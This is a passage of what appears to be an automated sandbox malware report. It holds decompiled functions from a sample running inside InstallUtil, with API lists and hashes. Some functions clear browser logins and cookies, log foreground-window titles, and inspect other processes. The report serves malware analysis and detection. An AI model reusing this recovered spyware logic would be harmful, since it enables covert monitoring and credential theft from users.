									_t65 = E004532B0(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E00439941();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E00439941();
					_t102 = 0x16;
					 *_t69 = _t102;
					E0043862C();
					goto L11;
				}
				_t71 = E00439941();
				_t103 = 0x16;
				 *_t71 = _t103;
				E0043862C();
				return _t103;
			}

0x0043e8ca
0x0043e8cf
0x0043e8ef
0x0043e8f0
0x0043e8f2
0x0043e8f5
0x0043e8f7
0x0043e90a
0x0043e90d
0x0043e90f
0x0043e912
0x0043e915
0x0043e918
0x0043e923
0x0043e925
0x0043e926
0x0043e928
0x0043e944
0x0043e948
0x0043e951
0x0043e956
0x0043e95d
0x0043e96a
0x0043e96f
0x0043e979
0x0043e97e
0x0043e983
0x0043e985
0x0043e98c
0x0043e98e
0x0043e98e
0x0043e993
0x0043e998
0x0043e999
0x0043e99c
0x0043e9a4
0x0043e9a4
0x0043e9a5
0x0043e9b3
0x0043e9bb
0x0043e9c8
0x0043e9c9
0x0043e9d3
0x0043e9d9
0x0043e9e3
0x0043e9ea
0x0043e9ee
0x0043e9f2
0x0043e9f7
0x0043e9fb
0x0043ea03
0x0043ea03
0x0043ea05
0x0043ea08
0x00000000
0x0043e99e
0x0043e99e
0x0043e99e
0x0043e99f
0x0043e99f
0x00000000
0x0043e99e
0x0043e99c
0x0043e92a
0x0043e933
0x0043e933
0x0043e93a
0x0043e93b
0x0043e93d
0x0043e93d
0x00000000
0x0043e93d
0x0043e92c
0x0043e931
0x00000000
0x00000000
0x00000000
0x0043e931
0x0043e91a
0x00000000
0x00000000
0x0043e91c
0x0043e921
0x00000000
0x00000000
0x00000000
0x0043e921
0x0043e8f9
0x0043e900
0x0043e901
0x0043e903
0x00000000
0x0043e903
0x0043e8d1
0x0043e8d8
0x0043e8d9
0x0043e8db
0x00000000

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d7d1fd1c36d080117e95db1f1fb7787f251b423cc2fcf4f76076f7352111f3
Instruction ID: 584172cc98d6fee99927fbde0a86b9851514b38a9ee259d400df271909638988
Opcode Fuzzy Hash: 41d7d1fd1c36d080117e95db1f1fb7787f251b423cc2fcf4f76076f7352111f3
Instruction Fuzzy Hash: CA4114B1A00704AFD7259F7AC841B6EBBA8EF8C710F10916FF111DB3C1D679A9058788

Uniqueness

Uniqueness Score: -1.00%

Function 0040A697 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103
sleepCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040A697(void* __edi) {
				char _v5;
				char _v6;
				char _v7;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				intOrPtr _t18;
				void* _t36;
				intOrPtr _t40;
				char _t50;
				void* _t52;
				void* _t53;
				signed int _t54;
				signed int _t55;
				void* _t56;

				_t52 = __edi;
				_t55 = _t54 & 0xfffffff8;
				 *0x46dae6 = 1;
				Sleep( *0x46daec);
				_v7 = 0;
				_t36 = 0;
				_v6 = 0;
				_v5 = 0;
				goto L1;
				do {
					do {
						L1:
						_t60 = _t36;
						if(_t36 == 0) {
							L2:
							_t36 = E0040A57D(_t60);
						}
						_t61 = _t36;
						if(_t36 == 0) {
							_t36 = E0040A3CB(_t50, _t52, _t61);
						}
						_t62 = _v6;
						if(_v6 == 0) {
							_v6 = E0040A1C4(_t36, _t50, _t52, _t62);
						}
						_t63 = _v7;
						if(_v7 == 0) {
							_v7 = E0040A135(_t50, _t52, _t63);
						}
						_t50 = _v5;
						_t64 = _t50;
						if(_t50 == 0) {
							_t50 = E0040A0A6(_t50, _t52, _t64);
							_v5 = _t50;
						}
						if(_t36 == 0 || _t36 == 0) {
							L16:
							Sleep(0x1388);
							_t18 = _v7;
							_t40 = _v6;
							_t50 = _v5;
						} else {
							_t18 = _v7;
							if(_t18 == 0 || _t50 == 0) {
								goto L16;
							} else {
								_t40 = _v6;
								if(_t40 == 0) {
									goto L16;
								}
							}
						}
						if(_t36 == 0) {
							goto L2;
						}
					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
					_t74 = _t40;
				} while (_t40 == 0);
				_t56 = _t55 - 0x18;
				E00402053(_t36, _t56, _t50, _t53, "\n[Cleared browsers logins and cookies.]\n");
				E0040A863(_t36, _t50, _t53, _t74);
				E00402053(_t36, _t56, _t50, _t53, "Cleared browsers logins and cookies.");
				_t57 = _t56 - 0x18;
				E00402053(_t36, _t56 - 0x18, _t50, _t53, "i");
				E00417D02(_t36, _t52);
				E00402053(_t36, _t57 + 0x18, _t50, _t53, 0x461084);
				_push(0xaf);
				E00404A78(0x46e850, _t50, _t74);
				if( *0x46dae5 != 0) {
					E00410DEB(0x46e5a0, E00401F6B(0x46e5a0), "FR", 1);
				}
				 *0x46dae6 = 0;
				return 0;
			}

0x0040a697
0x0040a69a
0x0040a6a5
0x0040a6ac
0x0040a6b8
0x0040a6bc
0x0040a6be
0x0040a6c4
0x0040a6c4
0x0040a6c8
0x0040a6c8
0x0040a6c8
0x0040a6c8
0x0040a6ca
0x0040a6cc
0x0040a6d1
0x0040a6d1
0x0040a6d3
0x0040a6d5
0x0040a6dc
0x0040a6dc
0x0040a6e2
0x0040a6e4
0x0040a6eb
0x0040a6eb
0x0040a6f3
0x0040a6f5
0x0040a6fc
0x0040a6fc
0x0040a700
0x0040a704
0x0040a706
0x0040a70d
0x0040a70f
0x0040a70f
0x0040a715
0x0040a72f
0x0040a734
0x0040a73a
0x0040a73e
0x0040a742
0x0040a71b
0x0040a71b
0x0040a721
0x00000000
0x0040a727
0x0040a727
0x0040a72d
0x00000000
0x00000000
0x0040a72d
0x0040a721
0x0040a748
0x00000000
0x00000000
0x0040a74a
0x0040a762
0x0040a762
0x0040a76a
0x0040a774
0x0040a779
0x0040a785
0x0040a78a
0x0040a794
0x0040a799
0x0040a7a8
0x0040a7ad
0x0040a7b7
0x0040a7c3
0x0040a7d8
0x0040a7de
0x0040a7df
0x0040a7ec

APIs

Sleep.KERNEL32 ref: 0040A6AC
Sleep.KERNEL32(00001388), ref: 0040A734

Strings

Cleared browsers logins and cookies., xrefs: 0040A780
[Cleared browsers logins and cookies.], xrefs: 0040A76F

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 2aa8957c3352b7599dfa9f55aa1e754481a577638ade0eab3824b6afb9cc6c57
Instruction ID: b00251936bdab44578a8662cefa7add838aa51f8e85430aea89b5e0fe6c95023
Opcode Fuzzy Hash: 2aa8957c3352b7599dfa9f55aa1e754481a577638ade0eab3824b6afb9cc6c57
Instruction Fuzzy Hash: F531A60164C3816EDA1177B514567AB6BA10E53788F0C887FF8C42B3D3E97A4819936F

Uniqueness

Uniqueness Score: -1.00%

Function 00408C31 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00408C31() {
				char _v2004;
				char _v2012;
				char _v2028;
				void* _v2036;
				char _v2056;
				void* _v2060;
				char _v2080;
				void* _v2084;
				void* _t15;
				signed int _t17;
				void* _t29;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t57;
				void* _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t63 = _t62 & 0xfffffff8;
				_t69 = _t63;
				_t64 = _t63 - 0x81c;
				_push(_t33);
				_t59 = _t34;
				_t61 = _t34 + 0x60;
				while(1) {
					E004337A0(_t57,  &_v2004, 0, 0x7d0);
					_t65 = _t64 + 0xc;
					while(1) {
						_t15 = E00401F6B(E00401E25(0x46e600, _t55, _t61, _t69, 0x2a));
						_t66 = _t65 - 0x18;
						E0040413E(_t33, _t66, _t55, _t61, _t15);
						_t17 = E00418A82( &_v2012, _t55);
						_t65 = _t66 + 0x18;
						_t69 = _t17;
						if(_t17 != 0) {
							break;
						}
						Sleep(0x1f4);
					}
					_t55 = E004042BC(_t33,  &_v2056, L"\r\n[ ", _t61, __eflags, E0040413E(_t33,  &_v2028, _t55, _t61,  &_v2004));
					E00401ED3(_t59 + 4, _t20, _t59, E00402FD4(_t33,  &_v2080, _t20, _t57, _t61, __eflags, L" ]\r\n"));
					E00401EC9();
					E00401EC9();
					E00401EC9();
					_t67 = _t65 - 0x18;
					E0040773A(_t33, _t67, _t55, __eflags, _t61);
					E00408935(_t59, _t55);
					while(1) {
						_t29 = E00401F6B(E00401E25(0x46e600, _t55, _t61, __eflags, 0x2a));
						_t68 = _t67 - 0x18;
						E0040413E(_t33, _t68, _t55, _t61, _t29);
						_t31 = E00418A82(0, _t55);
						_t64 = _t68 + 0x18;
						__eflags = _t31;
						if(__eflags == 0) {
							break;
						}
						Sleep(0x64);
					}
					E00409767(_t33, _t59, _t55);
				}
			}

0x00408c34
0x00408c34
0x00408c37
0x00408c3d
0x00408c40
0x00408c42
0x00408c45
0x00408c51
0x00408c56
0x00408c59
0x00408c67
0x00408c6c
0x00408c72
0x00408c7b
0x00408c80
0x00408c83
0x00408c85
0x00000000
0x00000000
0x00408c8c
0x00408c8c
0x00408cb7
0x00408cc7
0x00408cd0
0x00408cd9
0x00408ce2
0x00408ce7
0x00408ced
0x00408cf4
0x00408cf9
0x00408d07
0x00408d0c
0x00408d12
0x00408d19
0x00408d1e
0x00408d21
0x00408d23
0x00000000
0x00000000
0x00408d27
0x00408d27
0x00408d31
0x00408d31

APIs

Part of subcall function 00418A82: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00418A92
Part of subcall function 00418A82: GetWindowTextLengthW.USER32(00000000), ref: 00418A9B
Part of subcall function 00418A82: GetWindowTextW.USER32 ref: 00418AC5

Sleep.KERNEL32(000001F4), ref: 00408C8C
Sleep.KERNEL32(00000064), ref: 00408D27

Strings

], xrefs: 00408C94
[ , xrefs: 00408CA8

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 164a3672678753d05f8dd4a575bbbfc0e102b175466a17809f58e842cb3beba3
Instruction ID: 2d077f06fb0b53fc2435ad47f7fa176651a9889b4a2047f2feae98045539953f
Opcode Fuzzy Hash: 164a3672678753d05f8dd4a575bbbfc0e102b175466a17809f58e842cb3beba3
Instruction Fuzzy Hash: 9621A17160430057D608BB76DD179AE32A89F91349F40047FF982671E3FE3D9A49869F

Uniqueness

Uniqueness Score: -1.00%

Function 0043FB12 Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0043FB12(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				short** _t16;
				char* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x46d4d4; // 0x11ef008
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E00441BB3(_t13, _t11, 1);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E004427C2(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0044B830();
									E004427C2(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}

0x0043fb12
0x0043fb15
0x0043fb1d
0x0043fb26
0x0043fb7b
0x0043fb34
0x0043fb3a
0x0043fb3e
0x0043fb8c
0x0043fb8c
0x0043fb40
0x0043fb48
0x0043fb4b
0x0043fb4e
0x0043fb85
0x0043fb86
0x00000000
0x0043fb50
0x0043fb5a
0x0043fb66
0x00000000
0x0043fb68
0x0043fb68
0x0043fb69
0x0043fb6a
0x0043fb70
0x0043fb75
0x0043fb78
0x00000000
0x0043fb78
0x0043fb66
0x0043fb4e
0x0043fb81
0x0043fb84
0x00000000
0x0043fb84
0x0043fb7f
0x00000000
0x0043fb1f
0x0043fb23
0x0043fb23
0x00000000

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d72e44e0ec8390672a1a3b6757f80fc9a006d94aa1a43facb9091b1ede0e297
Instruction ID: 61742a2cb01b0248c3e3862991cb4d85dd77d14b0be68fabd2aaf05b5dde1b77
Opcode Fuzzy Hash: 9d72e44e0ec8390672a1a3b6757f80fc9a006d94aa1a43facb9091b1ede0e297
Instruction Fuzzy Hash: 6E018FF2A092167EF6211679ACD1F27A24CDB997B8F21233BF521512D2EA68AC444168

Uniqueness

Uniqueness Score: -1.00%

Function 0043FB91 Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0043FB91(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x46d4d0; // 0x11ec7e0
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E00441BB3(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E004427C2(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0044B83B(_t13);
									E004427C2(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}

0x0043fb91
0x0043fb94
0x0043fb9c
0x0043fba5
0x0043fbf4
0x0043fbb1
0x0043fbb7
0x0043fbbb
0x0043fc05
0x0043fc05
0x0043fbbd
0x0043fbc5
0x0043fbc8
0x0043fbcb
0x0043fbfe
0x0043fbff
0x00000000
0x0043fbcd
0x0043fbd3
0x0043fbdf
0x00000000
0x0043fbe1
0x0043fbe1
0x0043fbe2
0x0043fbe3
0x0043fbe9
0x0043fbee
0x0043fbf1
0x00000000
0x0043fbf1
0x0043fbdf
0x0043fbcb
0x0043fbfa
0x0043fbfd
0x00000000
0x0043fbfd
0x0043fbf8
0x00000000
0x0043fb9e
0x0043fba2
0x0043fba2
0x00000000

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 640fe06590b17db744a07aac0ad997ccfa506d422f73d5a74404842cb45e4370
Instruction ID: c65ecd6e1ceaf62599d570985ab8440679af588d9a66c02d8e6343f6cfe620e1
Opcode Fuzzy Hash: 640fe06590b17db744a07aac0ad997ccfa506d422f73d5a74404842cb45e4370
Instruction Fuzzy Hash: 2101D1F2A093167EB6101A7AACD0D27A25DDF953BCB30633BF522512D2EE78DC054168

Uniqueness

Uniqueness Score: -1.00%

Function 00408D9F Relevance: 6.1, APIs: 4, Instructions: 58
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00408D9F(void* __ecx, char* __edx) {
				void* __ebx;
				signed int _t8;
				int _t9;
				long _t14;
				char* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t30;

				_t22 = __edx;
				_t8 =  *0x46e450; // 0x0
				_t9 = _t8 |  *0x46e454;
				_t24 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x39)) = 0;
					do {
						_t9 = CreateFileW(E00401EC4(0x46e408), 0x80000000, 7, 0, 3, 0x80, 0);
						_t23 = _t9;
						if(_t23 == 0xffffffff) {
							 *((char*)(_t24 + 0x39)) = 0;
						} else {
							_t14 = GetFileSize(_t23, 0);
							_t30 = 0 -  *0x46e454; // 0x0
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x46e450)) {
								 *((char*)(_t24 + 0x39)) = 1;
								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
									E00409767(0, _t24, _t22);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t23);
						}
					} while ( *((char*)(_t24 + 0x39)) == 1);
					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
						_t35 =  *0x46c9c4 - 0x31;
						if( *0x46c9c4 == 0x31) {
							E0040773A(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
							return E00408935(_t24, _t22);
						}
					}
				}
				return _t9;
			}

0x00408d9f
0x00408d9f
0x00408da4
0x00408dad
0x00408daf
0x00408db7
0x00408dba
0x00408dd5
0x00408ddb
0x00408de0
0x00408e20
0x00408de2
0x00408de4
0x00408dea
0x00408df0
0x00408dfc
0x00408e03
0x00408e07
0x00408e07
0x00408e11
0x00408e11
0x00408e18
0x00408e18
0x00408e23
0x00408e2c
0x00408e2e
0x00408e35
0x00408e40
0x00000000
0x00408e47
0x00408e35
0x00408e2c
0x00408e4f

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408E77), ref: 00408DD5
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408E77), ref: 00408DE4
Sleep.KERNEL32(00002710,?,?,?,00408E77), ref: 00408E11
CloseHandle.KERNEL32(00000000,?,?,?,00408E77), ref: 00408E18

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID:
API String ID: 1958988193-0
Opcode ID: f905a2d68622227e5be47e99eb810132b5bf02293294938ac2a4d3deb26d20fb
Instruction ID: 283b43333eec9af8eeb0139d1d082ccfa4e1d47229b59270266cc477961fc445
Opcode Fuzzy Hash: f905a2d68622227e5be47e99eb810132b5bf02293294938ac2a4d3deb26d20fb
Instruction Fuzzy Hash: 83113D742003506AD7216735DE89A2F7B9AAB85348F04047EF1C1A76D3DE7C6C55839F

Uniqueness

Uniqueness Score: -1.00%

Function 004445A6 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E004445A6(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x46d658 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x459c20 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0xe1ce05ea
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x004445ab
0x004445af
0x004445b6
0x004445ba
0x004445c8
0x004445de
0x004445e2
0x0044460b
0x0044460d
0x00444611
0x00444614
0x00444614
0x0044461a
0x0044461c
0x00000000
0x0044461d
0x004445e4
0x004445ed
0x004445fc
0x004445ef
0x004445f2
0x004445f8
0x004445f8
0x00444600
0x00000000
0x00444602
0x00444605
0x00444607
0x00000000
0x00444607
0x00444600
0x004445bc
0x004445c1
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044454D,00000000,00000000,00000000,00000000,?,00444879,00000006,FlsSetValue), ref: 004445D8
GetLastError.KERNEL32(?,0044454D,00000000,00000000,00000000,00000000,?,00444879,00000006,FlsSetValue,0045A110,0045A118,00000000,00000364,?,00444327), ref: 004445E4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044454D,00000000,00000000,00000000,00000000,?,00444879,00000006,FlsSetValue,0045A110,0045A118,00000000), ref: 004445F2

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5f683d06c44a4bfe0f7e94e2b9ef38afa2d5335703dfacac1f416157521d427d
Instruction ID: 13903e7306a3e5ddb06965141d1748e220b9e71a834729409bca63e7deab9573
Opcode Fuzzy Hash: 5f683d06c44a4bfe0f7e94e2b9ef38afa2d5335703dfacac1f416157521d427d
Instruction Fuzzy Hash: E901D032611332ABEB214B79EC44B577798AFC5BA2B220631F906D7241D738DC41C6ED

Uniqueness

Uniqueness Score: -1.00%

Function 004361A0 Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 19%

			E004361A0(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E004367EF(_t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00435CC7(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E004369F1(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00435FAA(_t29, _t32, _t37);
				if(_t25 != 0) {
					E00435C95(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x004361a0
0x004361a0
0x004361a3
0x004361a8
0x004361ab
0x004361ad
0x004361b0
0x004361b3
0x004361b4
0x004361b7
0x004361bc
0x004361bc
0x004361bf
0x004361c3
0x004361c6
0x004361cb
0x004361c8
0x004361c8
0x004361c8
0x004361ce
0x004361d4
0x004361d7
0x004361d9
0x004361dc
0x004361df
0x004361e0
0x004361e9
0x004361ee
0x004361f1
0x004361f7
0x004361fa
0x004361fd
0x00436200
0x00436201
0x00436204
0x0043620f
0x00436213
0x00000000
0x00436213
0x0043621a

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004361B7

Part of subcall function 004367EF: ___AdjustPointer.LIBCMT ref: 00436839

_UnwindNestedFrames.LIBCMT ref: 004361CE
___FrameUnwindToState.LIBVCRUNTIME ref: 004361E0
CallCatchBlock.LIBVCRUNTIME ref: 00436204

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
Instruction ID: 07ce4a1b62ffed42848294d12b5225ac5bfccbd28765936126b58b9c57da0b16
Opcode Fuzzy Hash: bf861bfba03100e0359afbe7af2fd9297d541e05f4b4e03a7557866a70e7ae05
Instruction Fuzzy Hash: 2701D73200050ABBCF125F55CD01EDA7BBAEF4C758F16911AFD5866121C73AE861DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041871D Relevance: 6.0, APIs: 4, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E0041871D(void* __ecx, long __edx) {
				char _v524;
				void* __ebp;
				void* _t5;
				void* _t11;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = __edx;
				_t16 = __ecx;
				_t15 = OpenProcess(0x1000, 0, __edx);
				if(_t15 != 0) {
					_t5 =  *0x46dd14(_t15, 0,  &_v524, 0x208);
					_push(_t15);
					if(_t5 != 0) {
						CloseHandle();
						_push( &_v524);
					} else {
						CloseHandle();
						goto L1;
					}
				} else {
					L1:
					_push(0x4610ec);
				}
				E0040413E(_t11, _t16, _t14, _t17);
				return _t16;
			}

0x0041871d
0x00418730
0x00418738
0x0041873c
0x00418754
0x0041875a
0x0041875d
0x00418767
0x00418773
0x0041875f
0x0041875f
0x00000000
0x0041875f
0x0041873e
0x0041873e
0x0041873e
0x0041873e
0x00418776
0x00418782

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00418732
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00418754
CloseHandle.KERNEL32(00000000), ref: 0041875F
CloseHandle.KERNEL32(00000000), ref: 00418767

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameOpenProcess
String ID:
API String ID: 3706008839-0
Opcode ID: 390e4fbf3e51ea5e0d103f024a8be72e41443f9446193cad2dedb6c9c84ac5a6
Instruction ID: 05dbcac118bc452bc6cfcfa125cf480762597b572942487dc3779f449db42fd1
Opcode Fuzzy Hash: 390e4fbf3e51ea5e0d103f024a8be72e41443f9446193cad2dedb6c9c84ac5a6
Instruction Fuzzy Hash: E4F02E3164031477D66063649C0DFB7767CC7C4B86F20027BFA54D61D1FE64C8C146AA

Uniqueness

Uniqueness Score: -1.00%

Function 00435841 Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00435841() {
				void* _t4;
				void* _t8;

				E00436C50();
				E004357D5();
				if(E00436D77() != 0) {
					_t4 = E00436D29(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00436DB3();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00435841
0x00435846
0x00435852
0x00435857
0x0043585c
0x0043585e
0x00435869
0x00435860
0x00435860
0x00000000
0x00435860
0x00435854
0x00435854
0x00435856
0x00435856

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00435841
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00435846
___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043584B

Part of subcall function 00436D77: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00436D88

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00435860

Memory Dump Source

